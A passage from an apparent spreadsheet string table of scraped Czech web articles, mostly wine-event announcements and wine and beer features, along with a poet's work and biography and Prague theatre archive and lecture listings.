Pivní kultura se transformovala na virtuální hru přežití, kde se „pilsner“ a „ipa“ hádají o to, kdo je větším králem na baru. A kdo by to byl řekl – i tací, co si hrají na specialisty, pronajímají sklenice jako vzácné relikvie s puncem originality. Pilíř srandy a zábavy s každým douškem Samozřejmě, nesmíme zapomínat na fakt, že pivo je o společenství. Kde je lepší místo pro popovídání s kamarády, než u stolu s deseti půllitry? Ať už plánujete útok na budget za večer nebo se chystáte zúročit nedělní kalby, pivo je perfektní společník. Všichni víme, že s každou sklenicí se i zapomenuté trable rozplynou. Pár vtipů, které by za normálních okolností moc neprošly, teď roztaví led s každým snímkem z vaší mobilní galerie. Je zároveň fascinující, jak se pivo stalo pilířem kultury a tématem nesčetně konverzací. O čem jiném byste mluvili, když se sejdete s přáteli? O politice? Ne, to by nikoho nebavilo. Pivo stvořilo jakousi neviditelnou vazbu mezi lidmi, která v barové atmosféře roste víc, než ty sadby, které vám přítel dává jako „eko“ tip na zahradničení. A tak můžete klidně podupávat do rytmu poslední hitovky, zatímco v duši víte, že pivo je vaší spojnicí s tímto světem. Na konci dne, když se svět točí jako další fajnový lager v lednici, budiž řečeno – jděte ven, poznejte barové trasy, buďte zvědaví a pochybujte o tom, co považujete za normu. Ponořte se do tajemství piva ! Naplní vás nejen osvěžením, ale i příběhy, které se odráží od sklenic a probíhají napříč časy. V den, kdy se z metropolí stane místo plné úsměvů, obran zarytého vína a chmelových dobrodružství, kdy si všichni řeknou „tohle beru, ale třeba chci víc než jen jedno pivo !“ Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_487_3287054797_807b804c753f46bb0708.html</t>
  </si>
  <si>
    <t>807b804c753f46bb0708</t>
  </si>
  <si>
    <t>Svatomartinská a mladá vína</t>
  </si>
  <si>
    <t>Svatomartinská a mladá vína Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Mladým vínům požehná místní kněz, těšit se také můžete na zpěv mužského pěveckého sboru Révokaz z Čejkovic . Představí se vám všech 28 vinařství, která jsou členy spolku Čtvrtečníci. Nejvíce zastoupenými odrůdami při výrobě svatomartinských vín jsou v Čejkovicích Müller Thurgau a Modrý Portugal. Reklama Cena vstupného je 200 Kč a v ceně je zahrnuta degustační sklenička a neomezená možnost ochutnávky vín. Pokladny budou otevřeny od 10.00 hod. Akce se po celou dobu odehrává ve venkovních prostorách nádvoří zámku, proto doporučujeme teplé oblečení. Nalévání Svatomartinských a mladých vín bude ukončeno ve 14.00 hod., po skončení akce můžete navštívit místní restaurační zařízení a pochutnat si na tradičním svatomartinském menu v restauraci Hotelu Chateau Zámek Čejkovice , ve Sklepě U Templářských rytířů, v Bistru Na Farmě, v Restauraci Kuželna, ve Vinařství Škrobák nebo v Penzionu Adalbert. Těší se na vás Čtvrtečníci! Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>58</t>
  </si>
  <si>
    <t>55</t>
  </si>
  <si>
    <t>20241101_488_3303897705_620d9bc5fc04cf098302.html</t>
  </si>
  <si>
    <t>620d9bc5fc04cf098302</t>
  </si>
  <si>
    <t>Podzimní otevřené sklepy</t>
  </si>
  <si>
    <t>Podzimní otevřené sklepy Vinařský spolek Moravská Nová Ves zve v sobotu 9. listopadu 2024 od 10.00 hodin všechny příznivce a milovníky výborného moravského vína do autentických vinařských uliček v Moravské Nové Vsi k návštěvě malebných otevřených sklepů a ochutnávce vín od našich vinařů. Reklama K ochutnání budou připravena nejen vína aktuálního ročníku 2023, ale podle aktuálních možností budete moci v jednotlivých sklepích ochutnat i vína starší nebo naopak i právě vyrobená mladá vína z probíhajícího vinobraní 2024. Přímo v areálu se po celý den můžete těšit na bohatou nabídku občerstvení od lokálních kuchařů a kvalitní kávy nejen z místní Neoveské pražírny. Připraven bude i kulturní program s vystoupením cimbálové muziky a losování anketních lístků o ceny. Vstupné, jehož aktuální výši můžete najít na našem webu, je možné zakoupit se slevou v předprodeji. Přímý link na předprodej také najdete na našem webu. Vstupenka zahrnuje: – vstupné do areálu vinných sklepů, – skleničku s logem, – katalog otevřených sklepů s orientační mapkou a propiskou na poznámky, – kulturní program s vystoupením cimbálové muziky, – ochutnávku vín v jednotlivých označených vinných sklepích, – poukázky na nákup vína . Reklama Nabídku ubytování můžete nalézt na webu Městyse Moravská Nová Ves ( www.mnves.cz ) nebo jinde na internetu (např. booking.com, e-chalupy.cz). Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_489_3287054263_0073d42036435f575233.html</t>
  </si>
  <si>
    <t>0073d42036435f575233</t>
  </si>
  <si>
    <t>Otevřené vinné sklepy na Podřipsku</t>
  </si>
  <si>
    <t>Otevřené vinné sklepy na Podřipsku 0 z 5 fotografie Akce Otevřené vinné sklepy na Podřipsku dává možnost návštěvníkům možnost degustovat výpěstky ryze místních vinařů na krásné podzimní akci. Milovníci vína se seznámí s produkcí vinařů celého Podřipska během jediného dne. Od 10.00 do 20.00 hod. mohou návštěvníci zavítat přímo k místním vinařům do jejich sklepů či výroben. Do akce bude zapojeno minimálně sedm vinařů. Mezi jednotlivými sklepy účastníky přepraví speciální kyvadlové vínobusy na dvou linkách. V Kulturním domě Říp v Roudnici nad Labem nabídnou svá vína ti, kteří nedisponují vinnými sklepy pro velké skupiny. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_49_3264838436_1a3f5becc1f064d7bbc4.html</t>
  </si>
  <si>
    <t>1a3f5becc1f064d7bbc4</t>
  </si>
  <si>
    <t>Jak víno ovlivňuje naši chuť na jídlo a naše vnímání chutí</t>
  </si>
  <si>
    <t>Jak víno ovlivňuje naši chuť na jídlo a naše vnímání chutí Jooka Crew 1. 11. 2024 3 min read Víno , nápoj s bohatou historií a silnou kulturou, má nejenom schopnost povzbudit smysly, ale také může podstatně ovlivnit naše vnímání chutí jídla. Tato kombinace vín a pokrmů, známá jako “pairing”, není jen uměním, ale i vědou, která zkoumá, jak různé chutě mohou navzájem interagovat. V tomto článku se zaměříme na fascinující aspekty vína a jeho vliv na gastronomii, který může vést k překvapivým objevům na našich talířích. Vědecké pozadí chuťového vnímání Naše vnímání chutí je komplexní proces, který zahrnuje nejen chuťové buňky, ale i čich. Vědci zjistili, že až 80 procent chuti pokrmu závisí na našem čichu. Když tedy konzumujeme jídlo, aroma vína se propojuje s jeho vůní, což vytváří jedinečný zážitek. Tento zázrak se děje díky různým chemickým sloučeninám obsaženým ve vínech, které mohou silně ovlivnit to, jak vnímáme ostatní chutě. Například, pokud pijeme červené víno ke steakům, taniny obsažené v červeném víně mohou zmírnit tučnost a zvýraznit zemité chutě masa. Překvapivý fakt o víně, který mnozí neznají, je, že různé odrůdy hroznů obsahují odlišné kombinace aromatických sloučenin. Například vína vyrobená z hroznů Sauvignon Blanc mají vyšší koncentraci sloučenin, které se podobají vůním zelené papriky a citrusů. Na druhou stranu, Merlot vyniká ovocnými tóny tmavých bobulí, což může ovlivnit nejen volbu pokrmu, ale i samotnou chuť vína , jak se ukáže při ochutnávkách. Jak správně kombinovat víno s jídlem Kombinace vína s pokrmy může zásadně obohatit chuťový zážitek. Někteří odborníci na gastronomii doporučují, abychom se řídili jednoduchým pravidlem: víno by mělo doplňovat jídlo, nikoli s ním soupeřit. Například bílé víno , jako je Chardonnay, skvěle ladí s krémovými omáčkami, zatímco tazator Merlot se hodí spíše k červeným masům a výraznějším pokrmům. Avšak experimentování a osobní preference hrají klíčovou roli v objevování nových a nečekaných chutí. Fascinující je, že existují i vína , která se dokonce vyvinula s ohledem na specifické pokrmy. Například některá španělská vína typu Sherry byla tradičně vyráběna tak, aby doplnila tapas, což jsou malé porce jídla, jež se podávají ke sdílení. To ukazuje, jak kultura a místní tradice mohou utvářet nejen vína , ale také celkový gastronomický zážitek. Budoucnost vín a gastronomického párování S rostoucím zájmem o přírodní vína a biologickou produkci se mění i způsob, jakým přistupujeme k výběru vína . Mnoho someliérů dnes doporučuje vín z menších, ekologicky zaměřených vinic, což nejen podporuje udržitelnost, ale také odhaluje nové nuance chutí, které mohou obohatit naši gastronomickou zkušenost. S těmito trendy se objevuje prostor pro rozšíření znalostí a experimentování nejen v kombinacích s jídlem, ale i ve výběru správného vína . Zjednodušením procesu párování vína a pokrmů se stává kreativnější a osobnější cesta za objevováním chutí a zážitků. Víno není jen nápojem, ale fascinujícím společníkem, který nás zavádí na kulinářské výpravy, jež zůstávají v srdci i na paměti. V konečném důsledku se setkáme s nekonečnými možnostmi, které nám víno a gastronomické umění nabízejí, což nás často překvapí a inspiruje k novým objevům. Jak se vám článek líbil? Autor: Jooka Crew</t>
  </si>
  <si>
    <t>17</t>
  </si>
  <si>
    <t>14</t>
  </si>
  <si>
    <t>20241101_490_3295630850_7a40501db546e9a212fd.html</t>
  </si>
  <si>
    <t>7a40501db546e9a212fd</t>
  </si>
  <si>
    <t>Základy sommelierství, vína a vinařství ČR</t>
  </si>
  <si>
    <t>Základy sommelierství, vína a vinařství ČR 0 z 5 fotografie Základy sommelierství, vína a vinařství ČR je nejnavštěvovanějším kurzem Vinařského Institutu a po jeho absolvování získáte základní přehled v oblasti vína a vinné kultury. Jedná se o intenzivní celodenní kurz vinařství pod vedením některého ze špičkových sommelierů, kde se naučíte vše o degustaci a servisu vína , zjistíte jak snoubit víno s pokrmy i jak poznat vady a nedostatky vína . Dozvíte se, jak se třídí vína v České republice a jaké jsou přesně funkce sommeliera, samozřejmě vše včetně praktických ukázek. Kurz je současně vstupenkou do světa vína pro ty, kteří se rozhodnou dále studovat a dosáhnout až k CERTIFIKATU SOMMELIERA. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_491_3303900059_71948a7b4e6b11578876.html</t>
  </si>
  <si>
    <t>71948a7b4e6b11578876</t>
  </si>
  <si>
    <t>Svatomartinská degustace na Vinařské stodole</t>
  </si>
  <si>
    <t>Svatomartinská degustace na Vinařské stodole 0 z 5 fotografie Můžete se těšit na slavnostní přípitek a ochutnávky mladých a svatomartinských vín 2024 z produkce CHÂTEAU VALTICE, Vinařská škola Valtice a Vinařství Kovacs Novosedly, placené prohlídky Křížového sklepa, chrámu vína Vinařské stodoly a sklepa Venerie patřícího Střední vinařské škole… Přijďte si připít mladými a jiskrnými víny z ročníku 2024, užít si s přáteli či rodinou příjemné odpoledne v Hlavním městě vína – Valticích . Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_492_3318385816_a036ebb680595afebad2.html</t>
  </si>
  <si>
    <t>a036ebb680595afebad2</t>
  </si>
  <si>
    <t>Svěcení vína ročníku 2024</t>
  </si>
  <si>
    <t>Svěcení vína ročníku 2024 fotografie Obřad “Svěcení vína ” pořádá místní vinařský spolek Moravín Mikulov již od roku 1990. Své vzorky mladých vín zde prezentují malí i profesionální vinaři z Mikulova a blízkého okolí. Součástí je i nabídka Svatomartinské husy s knedlíkem a zelím od kuchařů hotelu Maroli Mikulov. Přijďte i Vy posvětit vlastní víno , které pak ochutnáte společně se všemi milovníky tohoto ušlechtilého nápoje. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_493_3241471730_013bf63ded8794289a6a.html</t>
  </si>
  <si>
    <t>013bf63ded8794289a6a</t>
  </si>
  <si>
    <t>VASILIOS CHALEPLIS POEZIE</t>
  </si>
  <si>
    <t>VASILIOS CHALEPLIS POEZIE až obrazovky nás uklidňují nekonečným pohybem těles rendrovaná miska se třemi křižujícími se drahami kterými putují tři glazurované kuličky až vypojí elektřinu budeme ty tři kuličky nosit na krku a pokládat hlavy na opuštěné koleje hledat jiskry brzdících vlaků poslední den našeho života se oběsíme na stromech vysokého napětí na cestě leží liška bez hřbetu naštěstí ho nacházím o pár kilometrů dál jako kopec porostlý pícemi ke kterému klusá nový život hříběte chytré dítě i hloupá kočka sdílí hrůzu z civění do útrob vesmíru alma je na východě jablko a na západě duše porcelánový je natažený krk dívky která očima zachytává odřezky hvězd když skončí předplatné světla a nastoupí mraky nemusíme nikam jít planeta nám sama klouže pod nohama dírou v obloze nad oderskými vrchy krouží paraglidisté píšou do mraků své vzkazy zatímco opodál řidiče škrtí dálnice v zahradách asfaltových uzlů hikikomori mladé stromky které nikdo nenavštěvuje jen dírou v obloze občas zatoulaná věta plná přestárlých slov doma se potraviny krčí expirací řepa v množném čísle zavařená vakuovaná posvátná jako srdce k transplantaci zbývají ti jen dvě minuty života ale nádech resetuje hodiny zaposlouchej se na ulicích popravují poslední myšlenku tvá ruka naposledy prohrábne přítomnost a tiše se rozplyne jako plechem pobitá ubytovna proměněná v prach bůh je největší developer a ty konečně slyšíš sebe jako modlitbu portálem okna k tobě připutuje svět tak směšně malý že si jeho atomy podáváme jako brko malování plotu štětce se suší na slunci a barví paprsky jako by chtěly založit požár mladí lidé umírají příliš brzy než aby je někdo bral vážně barva pomalu odkapává na zapomenuté inzeráty které přestárlé děti psávaly rukou na obloze černá vítr iluze vody rosa v ranních vzletech můry vůně čerstvého asfaltu nám trhá plíce absenci terapie si každý řešíme po svém já mám aretační šrouby v hlavě ty převádíš své névy na mapy vzdálených hvězdokup do labyrintu našeho mlčení občas vložíme plátek citronu a zrnko himálajské soli vznikne elektrolyt silný jen natolik abychom nedokázali rozlišit mezi bdělostí a snem součtu všeho ještě pořád říkáš bůh viděla jsi a zažila je všechny utrpení a radost odvržení a přijetí spíše se podřežeš ostrou mušlí než abys evakuovala svá dlouhodobá rozhodnutí do poslední sklenice s vodou jsi naložila vyhřeznutý kořen monstery květináč a vedle ní sklenička symbol těla a utíkající duše a toho že kopie bude vždycky horší než prosté nic válka den barevný jak rozstřílení plameňáci se šrapnely mladého hrášku z modrých očí se ti valí mochyně slz jsi slabá jako elfka vlny v našich šálcích se přehupují přes okraje za kterými se zbytečně umírá holter slunce zaznamenává nepatrnou odchylku v rytmu naší planety lhota na zárubních žehnání křídou bílou jako tvaroh s cukrem kašpar melichar a baltazar 1996 první vzpomínky těžká vůně kožené meruny dědovy popraskané sandále a naftou nasáklá srst vlčáka který hlídal místní autodílnu drobné prsty modré od kuliček temnoplodce prababička se zmenšovala a zmenšovala až byla menší než já až z ní zbyla jen hrst černého popílku kašpar melichar a baltazar 1999 fasáda bledá jako lokty od dumání nad mladým životem ztratil jsem svoje první hodinky a s nimi i pojem o čase skákal do hromady pilin a představoval si že saharské duny voní jako jabloňové dřevo cesty jsem trávil na zadním sedadle tmavě fialové felicie v představách pak za volantem modrostříbrné kachny zaparkované na pastelovém obrázku neznámé pařížské ulice odkud mě pokaždé vytáhla vůně babiččina boršče stejně bych nevěděl kam jet kašpar melichar a baltazar 2004 posed ve větvích staré jabloně a matematická formule pomocí které jsem si spočítal jestli mě spolužačka miluje láska tehdy byla jen nejasné šimrání v žaludku znásobené vysokým číslem konečného výsledku tisíce vystřílených diabolek a žolíci utopení v kanastě vůně ředidla a starých knih o alexandru makedonském rex král jméno psa kterého nikdo nechtěl až my canis lupus familiaris můj první pes miláček rodiny vrchní olizovač uší černý jako bukefalos vyčůranější než čert neposlouchal dokud ho děda nekopl do žeber kašpar melichar a baltazar 2008 řev nesoucí se od mokřinky až k lesu sousedka hledala svého manžela ve vzduchu byl slabý odér chlóru a nahodilé mňoukání kočky pak ho našla úporný jekot co se zahryzl do krve visel za nať jako pastinák krutě vytrhnutý ze života jako nahnilé jablko které konečně udolala gravitace byl to alkoholik a nikdo ho neměl rád ale pořád to byl člověk několik dní napnuté lano povolil můj děda a já to celé pozoroval škvírou tenčí než moje nová občanka od té doby vidím testrály kašpar melichar a baltazar 2011 rudé květy pivoněk pod obecním tlampačem dlaně okvětních listů orosené potem rána ženský hlas ohlásil smrt vypustil děsivé cikády ticha a ostré broky pámelníku pak zprávu o smrti zopakoval zvuk se nesl za hranice lhoty a ztratil se v lánech věčnosti a já věděl že to musí být pravda tehdy jsem zjistil že smutek se jako veličina nejspíše nikdy nepřestane rozmáhat a že seznam věcí které jsem mu nestihl říct už nikdy neproškrtám děda umřel sám v anonymním pokoji se špinavými záclonami pohřební hostinu měl v mokřince zbylý guláš skončil v mrazáku na lepší časy kašpar melichar a baltazar 2013 malé lahvičky alkoholu na půdě které ze zvědavosti postupně ubývaly opilost jako tvůrčí akt a měsíc jako kanvas lidské osamělosti utápěl jsem se ve starých obrazech v melancholických očích hráčky na lyru v něžnostech lovné zvěře ten rok jsme pohřbili rexe babička ho nechala zastřelit protože byl starý a dělal loužičky lesklé jako kapří šupiny pod talířem hrachovky popravu vykonal strýc hodil mu na zem piškot a střelil ho do temene krásná smrt šest tisíc mil pro vás trampy byla duše vrba sehnutá nad řekou dynamit na poli tehdy bouchnul a uťal hlavy třešním i když válka spotřebovala všechen oheň soudruh ti na vojně vzal libru nefronů a oběšencova hlava tě poznamenala jako čtyři kila uranové rudy tvá meditace v plachetce s tvarohem jednou jsem ti nechal na stole šest rovnoběžných sirek a vrátil se k voru co přepluje nil jódem pomalovaní jsme vypluli s kouřem z ořechového listí v zádech letos to bude přesně šest tisíc mil od pevné půdy pod nohama VASILIOS CHALEPLIS (*1993) Patří mezi organizátory a propagátory literárního života v Ostravě . Věnuje se copywritingu, dramatur gii a momentálně dokončuje doktorský program Teorie a dějiny české literatury na Ostravské univerzitě. Spoluzaložil kulturní platformu Harakiri a mezinárodní literární festival Inverze. Také je jedním z autorů knihy 111 míst v Ostravě , která musíte vidět mapující dynamiku ostravského života. Jeho básnické texty jsou zastoupeny v antologiích i sbor - nících (Pandezie, Harakiri) a v prvním ostravském poeziomatu. V dubnu 2023 mu v jeho domácím naklada telství vyšel básnický debut Flavedo, za který byl nominován na Cenu Jiřího Ortena a v literární kategorii Moravskoslezských uměleckých Cen Jantar. FOTO: HYNEK JAHODA</t>
  </si>
  <si>
    <t>20000</t>
  </si>
  <si>
    <t>20241101_494_3241471746_cb94f4c8b2bf9e615c41.html</t>
  </si>
  <si>
    <t>cb94f4c8b2bf9e615c41</t>
  </si>
  <si>
    <t>DRAM •A O• VÁNOCÍCH</t>
  </si>
  <si>
    <t>DRAM •A O• VÁNOCÍCH Rubrika: ARCHIV Nejznámější divadelní hrou konající se na pozadí vánočních svátků je patrně Ibsenovo drama Domeček pro panenky, nazývané také jako Domov loutek či Nora podle křestního jména hlavní hrdinky. Mimochodem pod názvem Vánoce byla tato hra vůbec poprvé uvedena u nás – v Prozatímním divadle v Brně roku 1887. Do předvánočně vyzdobeného bytu Helmerových pozvala diváky také režisérka Jana Kališová , když v roce 1999 inscenovala Domeček pro panenky v divadle Rokoko. Pro představitele hlavních rolí si vybrala Lenku Vlasákovou , jež alternovala s Marcelou Peňázovou . Torvalda Helmera ztvárnil Jiří Štěpnička . Znalci klasické literatury by si možná vzpomněli na scénu z Tolstého rozsáhlého románu Anna Karenina s názvem Vánoce u Ščerbackých, s níž pracovala i dramaturgyně Věra Mašková ve své scénické adaptaci Anny Kareniny uvedené na jevišti divadla ABC v roce 2007 v režii Petera Gábora . Příliš štědrý večer nazval dramatik Vratislav Blažek satirickou komedii odehrávající se v rodině svědomitého soudruha Nováka ( Rudolf Deyl ), jemuž děti naservírují nejedno překvapení. Novák , jenž se celý život soustředí na práci, totiž jaksi pozapomněl, že mu děti dospěly. Dcera i syn chystají svatbu, a na cestě je dokonce vnouče, jež čeká dcera ( Jiřina Bohdalová ) s dvacetiletým Tomášem ( Jiří Kodet ). Jsou to právě mezigenerační rozdíly a názorové konflikty, na nichž Blažek vystavěl komický a ryze společenskokritický děj hry. V zimním období se odehrávalo pokračování Bellanovy úspěšné adaptace Rychlých šípů, jak napovídal už sám název Rychlé šípy 2 – Sněhová mise. V jednoduchých, ale účelných kulisách malovaných hercem a výtvarníkem Adamem Novákem vydatně sněžilo, došlo v nich na koulovačku i lyžovačku, a Rychlé šípy si dokonce nadělily dárky pod improvizovaným stromečkem. Scéna, v níž Tonda Pírko ( Aťka Janoušková ) vrací odcizené dárky Rychlým šípům a chlapci ho na oplátku pozvou ke svému stromečku, dojímala diváky bez rozdílu věku. Bellan v ní s humorem vykreslil Mirka Dušína ( Jiří Hána ) jako lehce sobeckého egocentrika, který ve finále naděluje dárky především sám sobě. Další hra líčící Vánoce jako období klidu a míru, v níž by se mělo zapomenout na malicherné spory a posílit partnerská i rodičovská pouta, je hra britského dramatika Jamese Goldmana Lev v zimě uvedená v divadle Rokoko v roce 2001 v režii Ondřeje Zajíce. Hra inspirovaná reálnými postavami anglických dějin vypráví o turbulentním vztahu Eleonory Aquitánské ( Zdena Hadrbolcová ) s Jindřichem II . Plantagenetem ( Jan Vlasák ). Odehrává se o Vánocích roku 1183 na hradě Chinon , kam Jindřich II. pozval nejen svou vězněnou manželku Eleonoru, ale též jejich tři syny, mezi nimiž hodlá vybrat následníka trůnu. Přes četné konflikty nakonec nástupce nezvolí, dochází ke smíru a k oslavě Vánoc v rodinném kruhu. Mnohaletou stálicí předvánočního repertoáru divadla ABC byly České Vánoce z pera dramatika Jiřího Janků . Původně se jednalo o besídku divadelního souboru CD 94, kterou autor rozpracoval do podoby plnohodnotné jevištní inscenace. V režii Petra Svojtky ji poprvé uvedlo kladenské divadlo a v roce 2006 se s novým obsazením objevila na repertoáru Městských divadel pražských. Osobitá adaptace vánočního příběhu přivedla diváky divadla ABC do nejme nova né české venkovské hospody, v níž znuděné štamgasty zvedla ze židlí zpráva o narození Spasitele, a spustila tak lavinu komic kých událostí. V představení zazněla řada více či méně známých koled a v závěru večera si diváci spolu s herci zazpívali oblíbené Nesem vám noviny a Narodil se Kristus Pán. NA REPERTOÁRU MNOHÝCH DIVADEL SE V NADCHÁZEJÍCÍ ADVENTNÍ DOBĚ ZNOVU OBJEVÍ TITULY S VÁNOČNÍ TEMATIKOU. V MĚSTSKÝCH DIVADLECH PRAŽSKÝCH VYSTŘÍDÁ LONI NAPOSLEDY UVEDENÝ TITUL A OSEL NA NĚJ FUNĚL – VÁNOČNÍ PŘÍBĚH V REŽII MICHAELY HOMOLOVÉ NOVINKA JIŘÍHO JELÍNKA S NÁZVEM VÁNOCE U ČAPKŮ ANEB JAK KAREL A OLINKA VAŘILI DORT CUKROVÍ, A STANE SE TAK DALŠÍ V ŘADĚ INSCENACÍ, V NICH HRAJÍ HLAVNÍ ROLI VÁNOCE . Zazpívat koledy si můžete i letos ve vánočním speciálu Kroniky Městských divadel pražských. Sváteční svařeným vínem provoněné setkání s Přemyslem Rutem , Markétou Potužákovou a jejich přáteli se koná 13. prosince na Malé scéně divadla ABC . FOTO: VIKTOR KRONBAUER FOTO: VIKTOR KRONBAUER ARCHIV MDP FOTO: VLADIMÍR SVOBODA FOTO: ALENA HRBKOVÁ ARCHIV MDP 1 Henrik Ibsen : Domeček pro panenky (divadlo Rokoko, 1999) Jiří Štěpnička (JUDr. Torvald Helmer) a Marcela Peňázová (Nora) Režie Jana Kališová 2 Jaroslav Foglar , Robert Bellan: Rychlé šípy 2 – Sněhová mise (divadlo Rokoko, 2003) Veronika Koudelková (Sněhová vločka) Režie Robert Bellan 3 Jaroslav Foglar , Robert Bellan: Rychlé šípy 2 – Sněhová mise (divadlo Rokoko, 2003) Michal Kozelka (Rychlonožka), Adam Novák ( Jindra Hojer ), Kryštof Hádek (Jarka Metelka), Václav Jakoubek (Červenáček), Jiří Hána (Mirek Dušín) a Aťka Janoušková (Tonda Pírko) Režie Robert Bellan 4 Vratislav Blažek : Příliš štědrý večer (divadlo Komedie, 1960) Kresba Ladislava Svatoše v programu k inscenaci 5 James Goldman : Lev v zimě (divadlo Rokoko, 2001) Autorkou kresby na programu k inscenaci je Eva Petriková / archiv MDP 6 Lev Nikolajevič Tolstoj: Anna Karenina ( divadlo ABC , 2007) Michaela Badinková (Anna Karenina) a Martin Mňahončák (Vronskij) Režie Peter Gábor 7 Jiří Janků: České Vánoce ( divadlo ABC , 2006) Režie Petr Svojtka 8 Vratislav Blažek : Příliš štědrý večer (divadlo Komedie, 1960) Obálka programu s ilustrací Ladislava Svatoše 9 Jiří Janků: České Vánoce ( divadlo ABC , 2006) Veronika Svojtková (Fanča), Kateřina Lojdová (Manča), Veronika Janků (Starostová), Hanuš Bor (Pastýř), Jiří Hána (Janek), Martin Písařík (Tomek), Zuzana Kajnarová (Anča) a Lukáš Jurek (Franta) Režie Petr Svojtka 10 Šimon Olivětín: A osel na něj funěl – Vánoční příběh (divadlo Komedie 2019) Denis Šafařík ( Antonín Svoboda ) a Tereza Těžká (Sára Ackermannová) Režie Michaela Homolová ARCHIV MDP FOTO: PETR KREJČÍ FOTO: ALENA HRBKOVÁ FOTO: PATRIK BORECKÝ Autor: JUSTINA BARGEL KAŠPAROVÁ autorka je archivářka MDP Autor person Justina Bargel Kašparová Rubrika transition_slide ARCHIV</t>
  </si>
  <si>
    <t>20241101_495_3241423354_9c2e36463ce50148d495.html</t>
  </si>
  <si>
    <t>9c2e36463ce50148d495</t>
  </si>
  <si>
    <t>KRONIKA MĚSTSKÝCH DIVADEL PRAŽSKÝCH 20242025</t>
  </si>
  <si>
    <t>KRONIKA MĚSTSKÝCH DIVADEL PRAŽSKÝCH 20242025 13. PROSINCE 2024 PŘEMYSL RUT A KOL.: KOLEDUJEME SI – VÁNOČNÍ SPECIÁL Svařeným vínem provoněné předvánoční setkání s Přemyslem Rutem , Markétou Potužákovou a jejich přáteli. Zahrají a zazpívají vánoční písně staré i nové, české i evropské, lidové i autorské, zbožné i skeptické. 25. LEDNA 2025 JAN ŠOTKOVSKÝ: WESTERN, ŠEHEREZÁDA, JIRÁSEK – JAK SE TO RÝMUJE? MDP nikdy nebyla scénou specializovanou na hudební divadlo, ale „divadlo, které mluví, zpívá a tančí“ se jak v Ornestinu, tak ve Werichově Divadle ABC pěstovalo celkem intenzivně. V této přednášce se zaměříme na tři pozoruhodné původní muzikály napsané přímo pro scény MDP: Limonádového Joea (1955), Šeherezádu (1967) a Filosofskou historii (1968). ÚNOR–KVĚTEN 2025 VLADIMÍR JUST : NAROZEN VE ŠTÍRU – ŠÍŘIL SLUNCE! (POŘAD VĚNOVANÝ MIROSLAVU HORNÍČKOVI ) O životní a umělecké cestě takřka renesančně všestranného Miroslava Horníčka , která byla všechno jiné, jen ne bezkonfliktní. Od slibného rozjezdu v Plzni , přes bohatou kariéru na největších pražských scénách, jež určovaly směr československého divadla, až ke kariéře u rozhlasového mikrofonu či před televizní a filmovou kamerou. JANA SOPROVÁ: JAROSLAVA ADAMOVÁ – PROSTĚ JSEM BYLA POMINUTÁ DIVADLEM Herecká kariéra Jaroslavy Adamové byla neodmyslitelně spjata s Městskými divadly pražskými, zvláště pak s Divadlem ABC , do něhož ji přijal Jan Werich . Stala se spolehlivou oporou jeho souboru a v soukromí jeho „katastrofální přítelkyní“. Hvězda někdejšího Ornestina by v letošním roce oslavila 100. narozeniny. KAMILA ČERNÁ: DIVADLO KOMEDIE V DOBĚ UMĚLECKÉHO VEDENÍ MICHALA DOČEKALA ANEB OD HAMLETA K FAUSTOVI Přednáška zaměřená na období, kdy v Divadle Komedie působili Michal Dočekal a Jan Nebeský (1994–2002), nás seznámí s tehdejším repertoárem a s hereckým souborem, který v té době patřil k nejlepším v Praze . Pokusí se ozřejmit, čím se Dočekalova a Nebeského Komedie zapsala do dějin novodobého českého divadla. MARIE BAREŠOVÁ: MĚSTSKÁ DIVADLA PRAŽSKÁ A FILM Světy divadla a filmu k sobě mají blízko od vynálezu kinematografu. Propojují je umělecké přístupy, náměty i osobnosti. Městská divadla pražská patří ke scénám, u nichž jsou tyto vazby kontinuálně viditelné v řadě úrovní. Představíme si je na konkrétních příkladech prostřednictvím přednášky doplněné filmovými ukázkami. KRONIKA MĚSTSKÝCH DIVADEL PRAŽSKÝCH VŽDY JEDNOU MĚSÍČNĚ V SOBOTU ODPOLEDNE OD 15.00 DO 16.30 HODIN NA MALÉ SCÉNĚ DIVADLA ABC , NENÍ-LI UVEDENO JINAK. REZERVUJTE SI SVÉ MÍSTO VČAS NA: WWW.MESTSKADIVADLAPRAZSKA.CZ, NEBO V POKLADNÁCH MĚSTSKÝCH DIVADEL PRAŽSKÝCH. Miroslav Horníček : Malá noční inventura ( divadlo ABC 1982) FOTO: MARTIN POŠ Jaroslava Adamová FOTO: AUTOR NEZNÁMÝ Ladislav Trojan , Lubomír Lipský a Jan Skopeček ve filmu Tři chlapi v chalupě (1962) FOTO: SOUKROMÝ ARCHIV RODINY LIPSKÝCH</t>
  </si>
  <si>
    <t>20241101_496_3352606267_b3d20c900b7844b7681c.html</t>
  </si>
  <si>
    <t>b3d20c900b7844b7681c</t>
  </si>
  <si>
    <t>Víno mezi paletami</t>
  </si>
  <si>
    <t>Víno mezi paletami fotografie Čeká vás plný sklad palet, živé muziky a spousta vín k degustaci. Na jedné straně vína Svatomartinská, ale i další mladá vína ročníku 2024, na straně druhé, vína , která letos získala ocenění na prestižních soutěžích. Nabízí se vám tak úžasné srovnání úspěšných vín předchozích ročníků s jejich nejmladšími sourozenci ze stejných poloh, které mají soutěže teprve před sebou. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_497_3343865285_5098d245a6cc998c9cb7.html</t>
  </si>
  <si>
    <t>5098d245a6cc998c9cb7</t>
  </si>
  <si>
    <t>Sv. Martin na Hovoransku – den otevřených sklepů</t>
  </si>
  <si>
